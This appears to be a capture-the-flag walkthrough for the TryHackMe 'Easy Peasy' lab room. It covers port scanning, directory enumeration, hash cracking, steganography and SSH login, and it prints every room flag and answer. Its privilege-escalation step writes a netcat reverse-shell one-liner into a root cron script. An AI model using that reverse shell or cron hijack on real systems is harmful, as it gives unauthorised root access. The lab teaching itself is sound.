CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


26/10/2024 Shad Hussain Knowledge Views 330 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Easy Peasy - THM

Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A -T4 -sSV 10.10.209.133 FINDING PORT STATE SERVICE VERSION 80/tcp open http nginx 1.16.1 |_http-server-header: nginx/1.16.1 |_http-robots.txt: 1 disallowed entry |_http-title: Welcome to nginx! 6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 65524/tcp open http Apache httpd 2.4.43 ((Ubuntu)) |_http-server-header: Apache/2.4.43 (Ubuntu) |_http-robots.txt: 1 disallowed entry QUESTION How many ports are open? 3 QUESTION What is the version of nginx? 1.16.1 QUESTION What is running on the highest port? Apache -------------------------------------------------------------------------------------------------------- STEP2 dirb http://10.10.209.133 FINDING ---- Entering directory: http://10.10.209.133/hidden/whatever/ ---- Go to page sourse you will find p hiddenZmxhZ3tmMXJzN19mbDRnfQ==/p ---- use https://hashes.com/en/decrypt/hash to crack ZmxhZ3tmMXJzN19mbDRnfQ== QUESTION Using GoBuster, find flag 1. flag{f1rs7_fl4g} -------------------------------------------------------------------------------------------------------- STEP3 dirb http://10.10.209.133:65524/ http://10.10.209.133:65524/robots.txt FINDING + http://10.10.209.133:65524/robots.txt (CODE:200|SIZE:153) User-Agent:a18672860d0510e5ab6699730763b250 ---- use https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250 to crack and get flag{1m_s3c0nd_fl4g} QUESTION Further enumerate the machine, what is flag 2? flag{1m_s3c0nd_fl4g} -------------------------------------------------------------------------------------------------------- STEP3 dirb http://10.10.209.133:65524/ http://10.10.209.133:65524/ FINDING + http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818) you will find flag3 on the page ---- use https://hashes.com/en/decrypt/hash to crack 9fdafbd64c47471a8f54cd3fc64cd312 is candeger QUESTION Crack the hash with easypeasy.txt, What is the flag 3? flag{9fdafbd64c47471a8f54cd3fc64cd312} -------------------------------------------------------------------------------------------------------- STEP4 dirb http://10.10.209.133:65524/ http://10.10.209.133:65524/ ---- go to page sourse nd get p hiddenits encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu/p FINDING + http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818) https://www.better-converter.com/Encoders-Decoders/Base62-Decode and decode ObsJmP173N2X6dOrAgEAL0Vu and get /n0th1ng3ls3m4tt3r What is the hidden directory? /n0th1ng3ls3m4tt3r -------------------------------------------------------------------------------------------------------- STEP5 http://10.10.209.133:65524/n0th1ng3ls3m4tt3r/ ---- go to page sourse and get p940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81/p ---- use https://md5hashing.net/hash/gost/940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81 to get mypasswordforthatjob FINDING download the image on top middle ---- use steghide extract -sf binarycodepixabay.jpg ---- with passphrase mypasswordforthatjob ---- get a file secrettext.txt on Desktop QUESTION Using the wordlist that provided to you in this task crack the hash what is the password? mypasswordforthatjob -------------------------------------------------------------------------------------------------------- STEP6 ---- open secrettext.txt FINDING username:boring password: 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001 ---- use https://www.morsecodeninja.com/binary.html ---- password : iconvertedmypasswordtobinary QUESTION What is the password to login to the machine via SSH? iconvertedmypasswordtobinary -------------------------------------------------------------------------------------------------------- STEP7 ssh [email protected] -p 6498 password : iconvertedmypasswordtobinary ls -la cat user.txt QUESTION What is the user flag? flag{n0wits33msn0rm4l} -------------------------------------------------------------------------------------------------------- STEP8 cat /etc/crontab FINDING * * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc 10.0.0.1 1234 /tmp/f /var/www/.mysecretcronjob.sh open ---- nc -nvlp 1234 listner on new terminal on ssh terminal execute /var/www/./.mysecretcronjob.sh on new terminal cd /root cat .root.txt QUESTION What is the root flag? flag{63a9f0ea7bb98050796b649e85481845} --------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved